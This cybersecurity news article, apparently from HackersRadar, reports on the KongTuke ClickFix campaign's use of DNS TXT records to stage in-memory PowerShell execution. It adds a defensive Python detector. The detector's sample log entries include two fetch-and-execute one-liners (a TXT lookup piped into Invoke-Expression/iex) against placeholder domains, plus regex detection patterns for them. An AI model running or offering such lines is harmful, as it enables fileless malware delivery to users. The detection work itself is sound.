ClickFix Script Uses DNS TXT Records to Run PowerShell Commands
The KongTuke campaign has evolved, presenting a sophisticated new threat to the cybersecurity landscape. Active since mid-2025, this threat actor group consistently refines its techniques to bypass conventional enterprise security filters.
Their primary weapon remains the “ClickFix” strategy, a social engineering vector that deceives unsuspecting users into manually fixing simulated website errors.
In these attacks, victims encounter fake browser glitches or verification captchas on compromised legitimate websites.
Deceptive instructions prompt them to copy a malicious script and paste it directly into the Windows Run dialog or a PowerShell terminal.
This “self-infection” method effectively bypasses automated download protections by leveraging the user’s own system privileges to execute unauthorized code.
However, a significant escalation in technical tradecraft has recently surfaced. Unit 42 analysts identified that the latest KongTuke iterations now employ DNS TXT records to stealthily mask their next stage.
Instead of reaching out to a flagged web server via HTTP, the initial script queries the DNS TXT record of a legitimate-looking domain and retrieves the malicious staging instructions from that record.
This method significantly complicates detection for defenders relying on standard HTTP traffic analysis.
By embedding the payload within DNS responses, attackers seamlessly blend their malicious traffic with the constant background noise of internet resolution.
The ultimate goal remains the deployment of severe malware, often leading to the installation of the Interlock remote access trojan or other persistent threats within the network.
Mechanism of DNS TXT Staging
The technical innovation lies in the payload retrieval mechanism. When the victim executes the initial ClickFix snippet, it does not immediately download a file.
Instead, it triggers a PowerShell command that performs a DNS lookup for a specific TXT record.
These records, normally designed to hold text information for domain verification, contain the staged command string needed to fetch and execute the final payload.
Security controls often permit DNS traffic freely to ensure connectivity, creating a dangerous blind spot.
The script parses the text from the DNS response and executes it in memory, leaving minimal traces on the disk.
This “fileless” retrieval allows the KongTuke campaign to maintain a low profile while establishing persistence on compromised endpoints.
Recommendations include blocking newly registered domains, validating DNS traffic for anomalies, and strictly monitoring PowerShell execution logs for suspicious DNS lookup commands.
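As an added example (not code from the Unit 42 report or from this article), a small Python detector that applies the last recommendation to PowerShell script-block log entries: a TXT-record lookup on its own is flagged low severity, since domain verification is a legitimate use, while a TXT lookup combined with an in-memory execution primitive in the same script block is flagged high. The log entries and domain names are constructed samples.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample script-block log entries (PowerShell Event ID 4104 style); not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "script": "Resolve-DnsName -Name _dmarc.corp.example -Type TXT"},
    {"id": 2, "script": "$r = Resolve-DnsName -Type TXT -Name stage.example.invalid; "
                        "Invoke-Expression ($r.Strings -join '')"},
    {"id": 3, "script": "Get-Process | Where-Object CPU -gt 100"},
    {"id": 4, "script": "iex (nslookup -type=txt lookup.example.invalid | Select-String text)"},
    {"id": 5, "script": "[System.Net.Dns]::GetHostAddresses('www.example.com')"},
]

# A TXT lookup is recognised when a resolver command and a TXT query type both appear.
TXT_LOOKUPS = [
    (re.compile(r"\bResolve-DnsName\b", re.I), re.compile(r"-Type\s+TXT\b", re.I)),
    (re.compile(r"\bnslookup\b", re.I), re.compile(r"-(?:type|q|querytype)=txt\b", re.I)),
]

# Primitives that turn a string into running code without writing a file to disk.
EXEC_PRIMITIVES = re.compile(
    r"(?:\b(?:Invoke-Expression|iex)\b|\[ScriptBlock\]::Create)", re.I
)


def classify(script: str) -> Optional[str]:
    """Return 'high', 'low' or None for one script block."""
    has_txt = any(cmd.search(script) and qtype.search(script) for cmd, qtype in TXT_LOOKUPS)
    if not has_txt:
        return None
    # TXT lookup plus in-memory execution matches the staging pattern described above.
    return "high" if EXEC_PRIMITIVES.search(script) else "low"


def scan(events) -> List[Tuple[int, str]]:
    """Return (event id, severity) for every event that warrants review."""
    hits = []
    for event in events:
        severity = classify(event["script"])
        if severity:
            hits.append((event["id"], severity))
    return hits


if __name__ == "__main__":
    for event_id, severity in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {severity}")
```

In a real deployment the same two checks would run over the ScriptBlockText field of collected 4104 events, with the high-severity hits routed to triage.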
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.